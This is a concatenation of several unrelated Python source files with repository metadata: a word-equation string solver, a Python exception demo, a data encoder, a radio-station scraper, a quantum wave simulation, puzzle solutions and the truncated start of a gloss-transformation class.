ret_node.word_equations.index(selected_we)\n # make sure the head of the selected word equation for transform is excluded for replacement\n if lh == var:\n assert (we_idx, 0, 0) in var_we_pos_idx and (we_idx, 1, 0) not in var_we_pos_idx\n var_we_pos_idx.remove((we_idx, 0, 0))\n elif rh == var:\n assert (we_idx, 0, 0) not in var_we_pos_idx and (we_idx, 1, 0) in var_we_pos_idx\n var_we_pos_idx.remove((we_idx, 1, 0))\n else:\n print(var, lh, rh)\n print(var_we_pos_idx)\n assert False\n\n assert len(var_we_pos_idx) > 0\n wes_candidate = [we for we in ret_node.get_word_equations_to_solve() if var in we.lhs + we.rhs]\n assert len(wes_candidate) > 0\n # strategy 0: exclude one more var in word equation selected_we as the base of transform,\n # or exclude the first one in var_we_pos_idx\n if debug:\n print('quadratic strategy: {q_strategy}')\n q_strategy_same_flag = False\n if q_strategy == QuadraticStrategy.same_first or q_strategy == QuadraticStrategy.same_short or \\\n q_strategy == QuadraticStrategy.same_short_side:\n if debug:\n print(f'var_we_pos_idx : {var_we_pos_idx}')\n var_sel_we_pos_idx = [e for e in var_we_pos_idx if e[0] == we_idx]\n if debug:\n print(f'var_sel_we_pos_idx: {var_sel_we_pos_idx}')\n if len(var_sel_we_pos_idx) > 0:\n var_we_pos_idx.remove(var_sel_we_pos_idx[0])\n else:\n q_strategy_same_flag = True # proceed with other strategies\n # var_we_pos_idx.remove(var_we_pos_idx[0])\n if debug:\n print(f'var_we_pos_idx **: {var_we_pos_idx}')\n if q_strategy == QuadraticStrategy.first or \\\n (q_strategy == QuadraticStrategy.same_first and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n var_we_pos_idx.remove(var_we_pos_idx[0])\n if debug:\n print(f'var_we_pos_idx after: {var_we_pos_idx}')\n elif q_strategy == QuadraticStrategy.shortest or \\\n (q_strategy == QuadraticStrategy.same_short and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n len_sorted_wes = sorted(wes_candidate, key=lambda x: len(x))\n if debug:\n print(f'len_sorted_wes:')\n print(print_word_equation_list_pretty(len_sorted_wes))\n for we in len_sorted_wes:\n idx = ret_node.word_equations.index(we)\n tmp_pos_idx = [e for e in var_we_pos_idx if e[0] == idx]\n if len(tmp_pos_idx) > 0:\n var_we_pos_idx.remove(tmp_pos_idx[0])\n break\n if debug:\n 
print(f'var_we_pos_idx after: {var_we_pos_idx}')\n elif q_strategy == QuadraticStrategy.shortest_side or \\\n (q_strategy == QuadraticStrategy.same_short_side and q_strategy_same_flag):\n if debug:\n print(f'var_we_pos_idx before: {var_we_pos_idx}')\n len_sorted_wes = sorted(wes_candidate, key=lambda x: min(len(x.lhs), len(x.rhs)))\n if debug:\n print(f'len_sorted_wes:')\n print(print_word_equation_list_pretty(len_sorted_wes))\n for we in len_sorted_wes:\n idx = ret_node.word_equations.index(we)\n tmp_pos_idx = [e for e in var_we_pos_idx if e[0] == idx]\n if len(tmp_pos_idx) > 0:\n var_we_pos_idx.remove(tmp_pos_idx[0])\n break\n if debug:\n print(f'var_we_pos_idx after: {var_we_pos_idx}')\n else:\n assert not q_strategy_same_flag and \\\n (q_strategy == QuadraticStrategy.same_first or\n q_strategy == QuadraticStrategy.same_short or\n q_strategy == QuadraticStrategy.same_short_side)\n # print(f'quadratic strategy error: {q_strategy}')\n # assert False\n\n # do replacement\n if len(var_we_pos_idx) > 0:\n for e in var_we_pos_idx:\n if e[1] == 0:\n assert ret_node.word_equations[e[0]].lhs[e[2]] == var\n ret_node.word_equations[e[0]].lhs[e[2]] = new_var\n else:\n assert ret_node.word_equations[e[0]].rhs[e[2]] == var\n ret_node.word_equations[e[0]].rhs[e[2]] = new_var\n\n assert ret_node.var_occurrence(var) == 2\n if debug:\n print('after turn quadratic')\n print(print_word_equation_list_pretty(ret_node.word_equations))\n print(f'var_we_pos_idx: {var_we_pos_idx}')\n\n return ret_node, new_var\n\n\ndef turn_to_quadratic_wes(prob: Problem, wes: Optional[List[WordEquation]] = None):\n tgt_wes = wes or prob.word_equations\n occurred_var_count: Dict[StrElement, int] = dict()\n curr_var_copies: Dict[StrElement, StrElement] = dict()\n\n def _turn_to_quadratic(expr):\n nonlocal occurred_var_count, curr_var_copies\n for index, e in enumerate(expr):\n if e in occurred_var_count:\n occurred_var_count[e] += 1\n if occurred_var_count[e] % 2 == 1:\n var_copy_name = prob.new_variable(ValueType.string, e.value)\n e_copy = StrVariable(var_copy_name)\n curr_var_copies[e] = e_copy\n lc = LengthConstraint([e.length()], [e_copy.length()])\n prob.add_length_constraint(lc)\n reg_cons = prob.reg_constraints\n if e.value in reg_cons:\n reg_cons[e_copy.value] = reg_cons[e.value]\n expr[index] = curr_var_copies[e]\n elif is_var(e):\n occurred_var_count[e] = 1\n curr_var_copies[e] = e\n\n for we in tgt_wes:\n _turn_to_quadratic(we.lhs)\n _turn_to_quadratic(we.rhs)\n\n\n# functions for output: pretty print, c program, graphviz, etc.\ndef print_word_equation_pretty(we: WordEquation) -> str:\n left_str = ''.join(\n [f'[{e.value}]' if is_var(e) else e.value if is_char(e) else '$' for e in we.lhs]) or '\\\"\\\"'\n right_str = ''.join(\n [f'[{e.value}]' if is_var(e) else e.value if is_char(e) else '$' for e in we.rhs]) or '\\\"\\\"'\n return f'{left_str} = {right_str}'\n\n\ndef print_word_equation_list_pretty(wes: List[WordEquation]) -> str:\n return '\\n'.join([print_word_equation_pretty(e) for e in wes])\n\n\ndef print_reg_constraints_pretty(node: SolveTreeNode, indent: str = '') -> str:\n if node.reg_constraints:\n return '\\n\\n'.join([f'{indent}{s}:({str(node.regc_classes[s])}):\\n' +\n indent + str(node.reg_constraints[s]).replace('\\n', '\\n' + indent)\n for s in sorted(node.reg_constraints)])\n else:\n return ''\n\n\ndef print_reg_constraints_simple(node: SolveTreeNode) -> str:\n if node.regc_classes:\n return '-'.join([f'{s}({str(node.regc_classes[s])})' for s in sorted(node.regc_classes)])\n else:\n return ''\n\n\ndef 
print_solve_tree_node_pretty(node: SolveTreeNode, indent: str = '') -> str:\n wes_str = indent + '\\n'.join([print_word_equation_pretty(e) for e in node.word_equations])\n if node.reg_constraints:\n return f'{wes_str}:\\n{print_reg_constraints_pretty(node, indent*2)}'\n else:\n return wes_str\n\n\ndef print_solve_tree_node_simple(node: SolveTreeNode, indent: str = '') -> str:\n wes_str = indent + '\\n'.join([print_word_equation_pretty(e) for e in node.word_equations])\n if node.regc_classes:\n return f'{wes_str}:\\n{indent*2}{print_reg_constraints_simple(node)}'\n else:\n return wes_str\n\n\ndef print_tree_plain(tree: SolveTree):\n print(f'{tree.root}: ')\n cnt_node = 1\n for k in tree.node_relations.keys():\n print(f'{cnt_node} {k}')\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(f' {cnt} {t})')\n cnt += 1\n\n\ndef print_transform_rewrite_pretty(trans: Transform) -> str:\n if trans.record[0]:\n lval = trans.record[0].value\n else:\n lval = '\\\"\\\"'\n if trans.record[1]:\n rval = trans.record[1].value\n else:\n rval = '\\\"\\\"'\n if trans.rewrite == Rewrite.lvar_be_empty:\n return f'{lval}=\\\"\\\"'\n elif trans.rewrite == Rewrite.rvar_be_empty:\n return f'{rval}=\\\"\\\"'\n elif trans.rewrite == Rewrite.lvar_be_char:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.rvar_be_char:\n return f'{rval}={lval}'\n elif trans.rewrite == Rewrite.lvar_be_rvar:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.lvar_longer_char:\n return f'{lval}={rval}{lval}'\n elif trans.rewrite == Rewrite.rvar_longer_char:\n return f'{rval}={lval}{rval}'\n elif trans.rewrite == Rewrite.lvar_longer_var:\n return f'{lval}={rval}{lval}'\n elif trans.rewrite == Rewrite.rvar_longer_var:\n return f'{rval}={lval}{rval}'\n elif trans.rewrite == Rewrite.on_the_fly_quadratic:\n return ''\n else:\n return ''\n\n\ndef print_transform_rewrite_length(trans: Transform) -> str:\n if trans.record[0]:\n lval = trans.record[0].value\n else:\n lval = '\\\"\\\"'\n if trans.record[1]:\n rval = trans.record[1].value\n else:\n rval = '\\\"\\\"'\n if trans.rewrite == Rewrite.lvar_be_empty:\n return f'{lval}=0'\n elif trans.rewrite == Rewrite.rvar_be_empty:\n return f'{rval}=0'\n elif trans.rewrite == Rewrite.lvar_be_char:\n return f'{lval}=1'\n elif trans.rewrite == Rewrite.rvar_be_char:\n return f'{rval}=1'\n elif trans.rewrite == Rewrite.lvar_be_rvar:\n return f'{lval}={rval}'\n elif trans.rewrite == Rewrite.lvar_longer_char:\n return f'{lval}={lval}+1'\n elif trans.rewrite == Rewrite.rvar_longer_char:\n return f'{rval}={rval}+1'\n elif trans.rewrite == Rewrite.lvar_longer_var:\n return f'{lval}={lval}+{rval}'\n elif trans.rewrite == Rewrite.rvar_longer_var:\n return f'{rval}={rval}+{lval}'\n elif trans.rewrite == Rewrite.on_the_fly_quadratic:\n return ''\n else:\n return ''\n\n\ndef print_tree_pretty(tree: SolveTree, max_num: int = 0):\n print(f'word equation: {print_word_equation_pretty(tree.root.word_equation)}\\n')\n print(f'regular constraints:\\n{print_reg_constraints_pretty(tree.root)}\\n')\n cnt_node = 1\n for k in tree.node_relations:\n if max_num > 0:\n if cnt_node > max_num:\n return\n print(f'node{cnt_node}:\\n')\n print(print_solve_tree_node_pretty(k))\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(\n f' child{cnt}\\n'\n f' rewrite: {print_transform_rewrite_pretty(t)}\\n\\n'\n f' {print_solve_tree_node_pretty(t.source, \" \"*4)}\\n')\n cnt += 1\n\n\ndef print_tree_simple(tree: SolveTree, max_num: int = 0):\n print(f'word equation: 
{print_word_equation_pretty(tree.root.word_equation)}\\n')\n print(f'regular constraints:\\n{print_reg_constraints_simple(tree.root)}\\n')\n cnt_node = 1\n for k in tree.node_relations:\n if max_num > 0:\n if cnt_node > max_num:\n return\n print(f'node{cnt_node}:\\n')\n print(print_solve_tree_node_simple(k))\n cnt_node += 1\n cnt = 1\n for t in tree.node_relations[k]:\n print(\n f' child{cnt}\\n'\n f' rewrite: {print_transform_rewrite_pretty(t)}\\n'\n f' {print_solve_tree_node_simple(t.source, \" \"*4)}\\n')\n cnt += 1\n\n\ndef print_tree_dot_pretty(tree: SolveTree) -> str:\n # we_str = print_word_equation_pretty(tree.root.word_equation).replace('=', '-')\n name = f'tree_obj_{id(tree)}'\n # if not tree.has_solution():\n # print('no solution for word equation {we_str}')\n\n dot = Digraph(name=name, comment=name)\n for k in tree.node_relations.keys():\n node_str = print_word_equation_list_pretty(k.word_equations) + '\\n' +\\\n print_reg_constraints_simple(k)\n dot.node(node_str, node_str)\n for r in tree.node_relations[k]:\n next_node_str = print_word_equation_list_pretty(r.source.word_equations) + '\\n' +\\\n print_reg_constraints_simple(r.source)\n dot.edge(node_str, next_node_str, print_transform_rewrite_pretty(r))\n # print(dot.source)\n dot.render()\n return name\n\n\ndef print_tree_dot_pretty_sub(tree: SolveTree) -> str:\n name = f'tree_obj_{id(tree)}'\n\n dot = Digraph(name=name, comment=name)\n for k in tree.node_relations.keys():\n node_str = print_word_equation_list_pretty(k.word_equations) + '\\n' + \\\n print_reg_constraints_simple(k)\n flag = False\n for r in tree.node_relations[k]:\n next_node_str = print_word_equation_list_pretty(r.source.word_equations) + '\\n' +\\\n print_reg_constraints_simple(r.source)\n rewrite_str = print_transform_rewrite_pretty(r)\n # if 'X=YX' in rewrite_str or 'Y=XY' in rewrite_str:\n if r.rewrite == Rewrite.lvar_longer_var or r.rewrite == Rewrite.rvar_longer_var:\n dot.edge(node_str, next_node_str, rewrite_str)\n flag = True\n if flag:\n dot.node(node_str, node_str)\n # print(dot.source)\n dot.render()\n return name\n\n\ndef print_tree_c_program(tree: SolveTree, code_type: str, problem: Problem) -> str: # returns the filename\n # check type validity\n if code_type != 'interProc' and code_type != 'UAutomizerC' and code_type != 'EldaricaC':\n print(\n 'Type Error: type should be specified to \\\"interProc\\\" or \\\"UAutomizerC\\\" or \\\"EldaricaC\\\"')\n print('No c program output...')\n return\n\n # set some syntax keywords according to type\n if code_type == 'interProc':\n prog_start = 'begin'\n prog_end = 'end'\n while_start = 'do'\n while_end = 'done;'\n if_start = ' then'\n if_end = 'endif;'\n random_decl = ' rdn = random;'\n random_final = 'reachFinal = random;\\n'\n elif code_type == 'UAutomizerC' or code_type == 'EldaricaC':\n prog_start = ''\n prog_end = '}'\n while_start = '{'\n while_end = '}'\n if_start = ' {'\n if_end = '}'\n random_decl = ' rdn = __VERIFIER_nondet_int();\\n'\n random_final = 'reachFinal = __VERIFIER_nondet_int();\\n'\n\n # preprocessing, middle variables declaration\n trans = tree.node_relations\n visited_node = set()\n node2_count = dict()\n queued_node = set()\n variables = set()\n for var in problem.variables:\n if problem.variables[var] == ValueType.string or \\\n (problem.variables[var] == ValueType.int and not internal_len_var_name.match(var)):\n variables.add(var)\n # for s in trans.keys():\n # for t in s.word_equation.variables():\n # variables.add(t)\n # for e in int_vars:\n # if not length_origin_name(e):\n # 
variables.add(e) # add non-length variables in length constraints\n node_count = 0\n\n # open a file for writing code\n #filename = f'{print_word_equation_pretty(tree.root.word_equation).replace(\"=\", \"-\")}_{type}.c'\n filename = f'tree_obj_{id(tree)}_{code_type}.c'\n fp = open(filename, \"w\")\n\n # variable declaration\n if code_type == 'interProc':\n fp.write('var \\n')\n for s in variables:\n fp.write(f'{s.value}: int,\\n')\n fp.write('rdn: int,\\n')\n fp.write('nodeNo: int,\\n')\n fp.write('reachFinal: int;\\n')\n elif code_type == 'UAutomizerC':\n fp.write('extern void __VERIFIER_error() __attribute__ ((__noreturn__));\\n')\n fp.write('extern int __VERIFIER_nondet_int(void);\\n')\n fp.write('\\n')\n fp.write('int main() {\\n')\n for s in variables:\n fp.write(f' int {s};\\n')\n fp.write(' int rdn, nodeNo, reachFinal;\\n')\n elif code_type == 'EldaricaC':\n fp.write('int __VERIFIER_nondet_int(void) { int n=_; return n; }\\n')\n fp.write('\\n')\n fp.write('int main() {\\n')\n for s in variables:\n fp.write(f' int {s};\\n')\n fp.write(' int rdn, nodeNo, reachFinal;\\n')\n\n # program begins\n fp.write(prog_start)\n fp.write(f' nodeNo = {node_count};\\n') # set nodeNo to zero (initial node)\n fp.write(' reachFinal = 0;\\n')\n fp.write(f' while (1) {while_start}\\n')\n # start traverse from init node to final node\n init = tree.get_solution_node()\n final = tree.root\n [queued_node.add(s) for s in init]\n while len(queued_node) > 0:\n tmp_node = queued_node.pop()\n # cases of node\n if tmp_node in visited_node: # already processed: skip to next loop\n continue\n else:\n visited_node.add(tmp_node)\n\n if tmp_node in init: # this is the initial node\n fp.write(f' if (nodeNo=={node_count}) {if_start}\\n')\n # node_count = 0 (the first loop)\n fp.write(f' /* node = {print_word_equation_list_pretty(tmp_node.word_equations)} */\\n')\n else:\n fp.write(f' if (nodeNo=={node2_count[tmp_node]}) {if_start}\\n')\n # node2_count must has key \"tmp_node\"\n fp.write(f' /* node = {print_word_equation_list_pretty(tmp_node.word_equations)} */\\n')\n if tmp_node == final: # this is the final node\n if tmp_node in trans: # final node has transition\n fp.write(f' {random_final}')\n fp.write(f' if (reachFinal >= 0) {if_start} /* final node */\\n')\n fp.write(' break;\\n')\n fp.write(f' {if_end}\\n')\n else:\n fp.write(' break;\\n')\n fp.write(f' {if_end}\\n')\n continue\n\n tmp_labl = trans[tmp_node]\n tmp_len = len(tmp_labl)\n\n if tmp_len > 1: # two or more parent nodes # currently not completed\n fp.write(random_decl)\n # print \" assume rdn>=1 and rdn <=\" + str(tmp_len) + ';'\n rdn_count = 1 # start from 1\n for s in tmp_labl:\n if rdn_count == 1:\n fp.write(f' if (rdn<={rdn_count}) {if_start}\\n')\n elif rdn_count == tmp_len:\n fp.write(f' if (rdn>={rdn_count}) {if_start}\\n')\n else:\n fp.write(f' if (rdn=={rdn_count}) {if_start}\\n')\n fp.write(f' {print_transform_rewrite_length(s)};\\n')\n fp.write(f' // {print_transform_rewrite_pretty(s)};\\n')\n # information for retrieving solution\n if s.source in node2_count:\n fp.write(f' nodeNo={node2_count[s.source]};\\n')\n else:\n node_count += 1\n fp.write(f' nodeNo={node_count};\\n')\n node2_count[s.source] = node_count\n queued_node.add(s.source)\n fp.write(f' {if_end}\\n')\n rdn_count += 1\n else:\n for s in tmp_labl:\n fp.write(f' {print_transform_rewrite_length(s)};\\n')\n fp.write(f' // {print_transform_rewrite_pretty(s)};\\n')\n # information for retrieving solution\n if s.source in node2_count:\n fp.write(f' 
nodeNo={node2_count[s.source]};\\n')\n else:\n node_count += 1\n fp.write(f' nodeNo={node_count};\\n')\n node2_count[s.source] = node_count\n queued_node.add(s.source)\n\n fp.write(f' {if_end}\\n')\n fp.write(f' {while_end}\\n')\n length_cons = print_length_constraints_as_strings(problem.len_constraints)\n if length_cons:\n if len(length_cons) == 1:\n lc = length_cons[0]\n else: # multiple length constraints, take conjunction\n lc = ' && '.join(length_cons)\n if code_type == \"UAutomizerC\" and length_cons:\n # length constraint (for UAutomizer)\n fp.write(f' if ({lc}) {{ //length constraint: {length_cons}\\n')\n fp.write(' ERROR: __VERIFIER_error();\\n')\n fp.write(' }\\n')\n fp.write(' else {\\n')\n fp.write(' return 0;\\n')\n fp.write(' }\\n')\n if code_type == \"EldaricaC\" and length_cons: # length constraint (for Eldarica)\n fp.write(f' assert (!({lc})); //length constraint: {length_cons}\\n')\n fp.write(prog_end)\n\n fp.close()\n return filename\n","repo_name":"hsuhw/qses","sub_path":"src/main/python/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":58943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11552502771","text":"#!/usr/bin/env python\n# -*- coding:utf8 -*-\n# auther; 18793\n# Date:2019/9/8 20:46\n# filename: 01.一个简单的异常.py\n\ndef exp_exception(x, y):\n try:\n a = x / y\n print(\"a=\", a)\n except Exception:\n print(\"程序出现异常,异常信息:被除数为0\")\n\n\nexp_exception(2, 0) # 程序出现异常,异常信息:被除数为0\n\nexp_exception(1, 2) # a= 0.5\n","repo_name":"hujianli94/Python-code","sub_path":"9.异常程序调试/01.一个简单的异常.py","file_name":"01.一个简单的异常.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"40141368238","text":"import numpy as np\nimport pathlib\nimport json\n\n\ndef one_hot_encoding_data(data):\n new_data = []\n for index_i in range(len(data)):\n new_data.append([])\n for index_k in range(len(data[index_i])):\n value = data[index_i][index_k]\n if float(value) < 0:\n encoded_string = \"b001\"\n elif float(value) == 0:\n encoded_string = \"b010\"\n else:\n encoded_string = \"b100\"\n\n new_data[index_i].append(encoded_string)\n return new_data\n\n\ncurrentDirectory = str(pathlib.Path().absolute())\n\nX = np.load(currentDirectory + '/ConcatData/xScaledConcat.npy')\ny = np.load(currentDirectory + '/ConcatData/yConcat.npy')\n\nx_encoded = one_hot_encoding_data(X)\nwith open('xScaledConcatEncoded.txt', 'w') as file_handle:\n json.dump(x_encoded, file_handle)\n\n\n\n\n","repo_name":"furkanreha/HE-Training-Encoded","sub_path":"encodeTheData.py","file_name":"encodeTheData.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"9429853511","text":"from weboob.browser import PagesBrowser, URL\nfrom .pages import RadioPage, JsonPage, PodcastPage\n\n__all__ = ['RadioFranceBrowser']\n\n\nclass RadioFranceBrowser(PagesBrowser):\n json_page = URL('sites/default/files/(?P.*).json',\n 'player-json/reecoute/(?P.*)',\n 'station/(?P.*)',\n 'programmes\\?xmlHttpRequest=1',\n 'autocomplete/emissions.json',\n JsonPage)\n podcast_page = URL('podcast09/rss_(?P.*)\\.xml', PodcastPage)\n radio_page = URL('(?P.*)', RadioPage)\n\n def get_radio_url(self, radio, player):\n self.fill_base_url(radio)\n\n if radio == 'francebleu':\n return self.json_page.go(fbplayer=player).get_fburl()\n\n return self.radio_page.go(page=player).get_url()\n\n def 
fill_base_url(self, radio):\n if radio in ['franceinter', 'francebleu', 'franceculture', 'francemusique']:\n self.BASEURL = 'https://www.%s.fr/' % radio\n else:\n self.BASEURL = 'http://www.%s.fr/' % radio\n\n def get_current(self, radio, url):\n self.fill_base_url(radio)\n\n if radio == 'francebleu':\n return self.radio_page.go(page=url).get_current()\n\n if radio in ['franceculture', 'franceinter', 'francemusique']:\n return self.json_page.go().get_culture_inter_current()\n\n if radio == 'francetvinfo':\n return u'', u''\n\n return self.json_page.go(json_url=url).get_current()\n\n def get_selection(self, radio_url, json_url, radio_id):\n self.BASEURL = 'http://www.%s.fr/' % radio_url\n if radio_id == 'fipradio':\n return self.json_page.go(json_url_fip=json_url).get_selection(radio_id=radio_id)\n elif radio_id == 'franceculture':\n self.fill_base_url(radio_id)\n return self.radio_page.go(page='').get_france_culture_selection(radio_id=radio_id)\n elif radio_id == 'francetvinfo':\n self.fill_base_url(radio_id)\n selection_list = self.radio_page.go(page=json_url).get_francetvinfo_selection_list()\n sel = []\n for item in selection_list:\n sel.append(self.radio_page.go(page=item).get_francetvinfo_selection())\n return sel\n\n return self.json_page.go(json_url=json_url).get_selection(radio_id=radio_id)\n\n def get_audio(self, _id, radio_url, json_url, radio_id):\n for item in self.get_selection(radio_url, json_url, radio_id):\n if item.id == _id:\n return item\n return []\n\n def get_podcast_emissions(self, radio_url, podcast_url, split_path):\n self.fill_base_url(radio_url)\n if split_path[0] == 'franceinter':\n return self.radio_page.go(page=podcast_url).get_france_inter_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'franceculture':\n self.location('%s%s' % (self.BASEURL, podcast_url))\n return self.page.get_france_culture_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'francetvinfo':\n return self.radio_page.go(page=podcast_url).get_france_info_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'francemusique':\n return self.radio_page.go(page=podcast_url).get_france_musique_podcast_emissions(split_path=split_path)\n elif split_path[0] == 'mouv':\n return self.radio_page.go(page=podcast_url).get_mouv_podcast_emissions(split_path=split_path)\n\n def get_podcasts(self, podcast_id):\n self.BASEURL = 'http://radiofrance-podcast.net/'\n return self.podcast_page.go(podcast_id=podcast_id).iter_podcasts()\n\n def get_france_culture_podcasts_url(self, url):\n self.BASEURL = 'https://www.franceculture.fr/'\n return self.radio_page.go(page='emissions/%s' % url).get_france_culture_podcasts_url()\n\n def get_francetvinfo_podcasts_url(self, url):\n self.BASEURL = 'http://www.francetvinfo.fr/'\n return self.radio_page.go(page='replay-radio/%s' % url).get_francetvinfo_podcasts_url()\n","repo_name":"laurentb/weboob","sub_path":"modules/radiofrance/browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","stars":93,"dataset":"github-code","pt":"75"} +{"seq_id":"23954992630","text":"import numpy as np\nimport sympy as sp\n\nfrom matplotlib import pyplot as plt\nfrom sympy import init_printing\nfrom sympy.utilities.lambdify import lambdify\nfrom matplotlib.animation import FuncAnimation\n\nimport ival\nimport para\n\nnx = para.nx\nnt = para.nt\ndx = para.dx\ndt = para.dt\n\nfn_phi = ival.fn_phi\nfn_v = 
ival.fn_v\n#################################################\n#################################################\n#################################################\n\n\nx=np.linspace(-1/2,1/2,nx)\n\nphi=np.asarray([fn_phi(xi) for xi in x], dtype=complex)\nnorm = np.sum(np.abs(phi**2))\nphi = phi/norm\nv=np.asarray([fn_v(xi) for xi in x], dtype=complex) * 500\n\n#################################################\n#################################################\n#################################################\n\ndef phi():\n \n result=np.zeros([nt,nx], dtype=complex)\n result[0]=[fn_phi(xi) for xi in x]\n \n for i in range(len(result)-1):\n result[i+1][1:-1] = result[i][1:-1] +\\\n 1j*dt*v[1:-1]*result[i][1:-1] +\\\n 1j/2 * dt/dx**2 * (result[i][2:] - 2*result[i][1:-1] + result[i][:-2]) \n result[i+1][0]=result[i+1][-1]=0\n\n norm = np.sum(np.abs(result[i+1])) * dx*2\n result[i+1]=result[i+1]/norm\n\n return result\n\n\n","repo_name":"ramakantgadhewal/NMQM","sub_path":"python/tmp/compute.py","file_name":"compute.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"46868805452","text":"# Question Link - https://leetcode.com/problems/permutation-sequence/\n\n# Solution - \n\nclass Solution:\n def getPermutation(self, n: int, k: int) -> str:\n fact = [1, 1, 2, 6, 24, 120, 720, 5040, 40320, 362880, 3628800]\n arr = [\"0\"]\n \n for i in range(1, n+1):\n arr.append(str(i))\n\n ans = \"\"\n \n while k != 0:\n t = k//(fact[n-1])\n r = k%(fact[n-1])\n\n if r == 0:\n ans += arr[t]\n arr.remove(arr[t])\n ans += (''.join(arr[1:][::-1]))\n else:\n ans += arr[t+1]\n arr.remove(arr[t+1])\n \n k = r\n n -= 1\n \n return ans\n","repo_name":"codethat-vivek/Code","sub_path":"LeetCode/Permutation Sequence.py","file_name":"Permutation Sequence.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22686122321","text":"import numpy as np\nfrom itertools import product\n\nwith open(\"input.txt\", \"rb\") as f:\n d = f.read().strip()\nd = np.frombuffer(d, dtype=np.uint8) - 48\nd = d.reshape((d.size//(25*6), 6, 25))\n\ncounts = []\nfor layer in d:\n layer = layer.ravel()\n counts.append((sum(layer == 0), sum(layer == 1), sum(layer == 2)))\n\n# Part 1\nmc = min(counts)\nprint(mc, mc[1]*mc[2])\n\n# Part 2\nimage = np.full((6, 25), 2, dtype=np.uint8)\nfor layer in d:\n for x, y in product(range(25), range(6)):\n if image[y, x] == 2:\n image[y, x] = layer[y, x]\nfor y in range(6):\n for x in range(25):\n print(\" \" if image[y, x] == 0 else \"█\", end='')\n print()\n","repo_name":"spauka/AOC2019","sub_path":"d8/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"1807504401","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# AUTHOR: Tonio Weidler\n\n\"\"\"Module provides a class for transforming glosses into logical transformations.\"\"\"\n\nimport sys\nimport os\nsys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), \"../../\"))\n\nimport subprocess as sp\nfrom src.glosses.Glosses import CollocationMember, CollocationHead\nimport re\nimport json\nimport datetime\nfrom src.util import find_predicates\n\nclass GlossTransformer(object):\n\t\"\"\"Gloss Transformation Class that allows to transform a collection of disambiguated glosses into\n\tlogically transformed 
glosses.\n\n\tAttributes:\n\t\tglosses\t\t(dict)\t\tdictionary containing the synset ids and their untransformed glosses\n\n\tMethods:\n\t\ttransform_glosses\t\t\t(dict/bool)\t\ttransform the glosses from scratch into an corpus containing\n\t\t\t\t\t\t\t\t\t\t\t\t\tthe used gloss order and one line per transformed gloss(-part)\n\t\t\t\t\t\t\t\t\t\t\t\t\toptionally write this corpus to a file to avoid repeting the process\n\t\tread_transformed_glosses\t(dict)\t\t\tread the transformed glosses corpus from a file and create LogicallyTransformedGlosses\n\t\"\"\"\n\n\tdef __init__(self, glosses):\n\t\tself.__dict__.update(locals())\n\t\tdel self.__dict__[\"self\"]\n\n\t\tlog_dir = \"log/\"\n\t\ttime = datetime.datetime.now()\n\t\ttimestamp = \"{0}_{1}_{2}_{3}:{4}\".format(time.day, time.month, time.year, time.hour, time.minute)\n\t\tself._logfile = log_dir + \"gloss_transformation_\" + timestamp + \".log\"\n\t\twith open(self._logfile, \"w\") as f:\n\t\t\tf.write(\"LOG FILE - GLOSS TRANSFORMATION\\n\\n\")\n\n\t\tself._gloss_order = list(self.glosses.keys())\n\t\tself._transformation_type = \"logic\"\n\n\t\tself._mappable_predicates = 0\n\t\tself._mapped_predicates = 0\n\n\tdef transform_glosses(self, target_file=None):\n\t\t\"\"\"Transform the glosses from scratch into an corpus containing\n\t\tthe used gloss order and one line per transformed gloss(-part)\n\t\toptionally write this corpus to a file to avoid repeting the process.\n\n\t\tArguments:\n\t\t\ttarget_file\t\t(string)\toptionally provide a path that the corpus will\n\t\t\t\t\t\t\t\t\t\tbe written to\n\t\tReturns:\n\t\t\t(bool/string)\tif no path provided return the gloss corpus as strings,\n\t\t\t\t\t\t\telse if writing succeeds return True\n\t\t\"\"\"\n\t\tprint(\"=== Transforming Glosses ===\")\n\t\tprint(\"building corpus...\")\n\t\tgloss_corpus = self._build_gloss_corpus(self.glosses)\n\t\tprint(\"transforming...\")\n\t\tparsed_gloss_corpus = self._apply_transformation_tool(gloss_corpus)\n\t\tgloss_order_reference = \"%ORDER {0}\\n\".format(self._gloss_order)\n\n\t\tif target_file:\n\t\t\twith open(target_file, \"w\") as f:\n\t\t\t\tf.write(str(gloss_order_reference + parsed_gloss_corpus))\n\t\t\treturn True\n\n\t\telse:\n\t\t\treturn parsed_gloss_corpus\n\n\tdef read_transformed_glosses(self, filename):\n\t\t\"\"\"Read the transformed glosses corpus from a file and create LogicallyTransformedGlosses.\"\"\"\n\t\tprint(\"=== Transforming Glosses ===\")\n\t\twith open(filename, \"r\") as f:\n\t\t\tcontent = f.read()\n\n\t\torder = re.search(\"%ORDER (.*?)\\n\", content).group(1)\n\t\tself._gloss_order = json.loads(re.sub(\"'\", '\"', order))\n\n\t\ttransformed_glosses = re.sub(\"(^%.*?\\n|\\n\\Z)\", \"\", content)\n\t\ttransformed_glosses_list = [g if g != \"\" else \"EMPTY\" for g in 